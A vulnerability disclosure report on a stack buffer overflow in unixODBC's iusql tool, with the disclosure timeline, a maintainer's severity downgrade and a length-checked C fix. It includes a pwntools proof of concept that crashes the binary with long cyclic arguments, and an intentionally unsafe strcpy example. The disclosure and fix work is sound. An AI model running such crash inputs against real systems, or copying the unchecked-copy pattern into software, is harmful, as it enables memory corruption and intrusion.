Classic stack overflow with the ability to hijack control in lurcher/unixodbc

Valid

Reported on May 31st 2022


Description

If arguments longer than 1024 characters are passed to the iusql program, a classic stack-based buffer overflow occurs.
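The pattern behind a bug of this kind, and the length check that prevents it, as an added illustration written for this page (hypothetical code, not iusql's source and not the project's fix; the 1024-byte buffer size, the function names and the argument handling are assumptions):

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed buffer size mirroring the 1024 in the report; not iusql's real layout. */
#define ARG_BUF_SIZE 1024

/* Vulnerable pattern (illustrative only): a command-line argument is copied into a
 * fixed-size stack buffer with no length check, so any argument of ARG_BUF_SIZE
 * characters or more writes past the end of buf and over the saved data above it
 * on the stack. Shown for contrast; never call it with untrusted input. */
void copy_arg_unchecked(const char *arg)
{
    char buf[ARG_BUF_SIZE];
    strcpy(buf, arg);                 /* no bound on strlen(arg): classic stack overflow */
    printf("copied %zu characters\n", strlen(buf));
}

/* Hardened form: copy only if the argument, including its NUL terminator, fits in
 * dst_size bytes. Returns 0 on success, -1 if the argument is too long. memchr never
 * looks past dst_size bytes, so over-long input is rejected without being read fully. */
int copy_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    const char *nul = memchr(arg, '\0', dst_size);
    if (nul == NULL)
        return -1;                    /* strlen(arg) >= dst_size: would overflow dst */
    memcpy(dst, arg, (size_t)(nul - arg) + 1);
    return 0;
}

/* Validate every argument before any of them reaches a fixed buffer of buf_size bytes.
 * Returns the number of arguments rejected as too long. */
int check_args(int argc, char **argv, size_t buf_size)
{
    int rejected = 0;
    for (int i = 1; i < argc; i++) {
        if (memchr(argv[i], '\0', buf_size) == NULL) {
            fprintf(stderr, "argument %d is too long (max %zu characters)\n",
                    i, buf_size - 1);
            rejected++;
        }
    }
    return rejected;
}

int main(int argc, char **argv)
{
    char buf[ARG_BUF_SIZE];
    if (check_args(argc, argv, sizeof buf) != 0)
        return 1;                     /* refuse to run rather than overflow */
    for (int i = 1; i < argc; i++) {
        copy_arg_checked(buf, sizeof buf, argv[i]);   /* cannot fail after check_args */
        printf("argument %d accepted (%zu characters)\n", i, strlen(buf));
    }
    return 0;
}
```

The "*** buffer overflow detected ***" line in the report's output is glibc's _FORTIFY_SOURCE check aborting the process when a fortified string call such as strcpy would overrun its destination; that is a crash-on-detection mitigation provided by the build, not a fix in the program. The explicit check above rejects the argument before any copy is attempted, so the process fails with an error message instead of a memory-safety violation.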

Proof of Concept

I removed the docking check to reduce the PoC; this check did not show overflow protection.

# Fetch the source into a directory named 123 and disable the check the researcher
# refers to as the "docking check" so the PoC is shorter
git clone https://github.com/lurcher/unixODBC.git 123
sed -i 's/^.*if ( .*phEnv, phDbc ) != SQL_SUCCESS/if(0/g' 123/exe/iusql.c

import os
os.environ['PWNLIB_NOTERM'] = '1'       # pwntools: do not use terminal features
os.environ['JUPYTER_DETECTED'] = 'yes'  # pwntools: running inside a notebook
from pwn import *

# argv[0] is the binary; the three remaining arguments are 1024-byte cyclic patterns
a = ['A'] * 4
a[0] = '123/exe/iusql'
a[1] = cyclic(1024)
a[2] = cyclic(1024)
a[3] = cyclic(1024)

ex = process(argv=a)
ex.interactive()

Output:

[x] Starting local process '123/exe/iusql'
[+] Starting local process '123/exe/iusql': pid 25548
[*] Switching to interactive mode
*** buffer overflow detected ***: /content/123/exe/.libs/iusql terminated

Impact

When the overflow is triggered, control of execution is seized, establishing full control over the process.

We are processing your report and will contact the lurcher/unixodbc team within 24 hours. 2 years ago
ihsinme modified the report 2 years ago
ihsinme modified the report 2 years ago
ihsinme submitted a 2 years ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
We have contacted a member of the lurcher/unixodbc team and are waiting to hear back a year ago
lurcher modified the Severity from High to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
lurcher validated this vulnerability a year ago
ihsinme has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
lurcher marked this as fixed in 2.3.12pre with commit c6c547 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
ihsinme (Researcher), a year ago:

How can I see why the severity was lowered? In what criteria did I make a mistake? Thanks.

ihsinme (Researcher), a year ago:

Good afternoon. In this report the developer fixed the level to LOW, but I can't figure out what stats it lowered. The original rating was AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. How do I see the current rating vector?

Jamie Slome (Admin), a year ago:

Hello 👋 The maintainer has hard-set the severity level to LOW irrespective of the vectors, i.e. they generally think that this has a low impact.
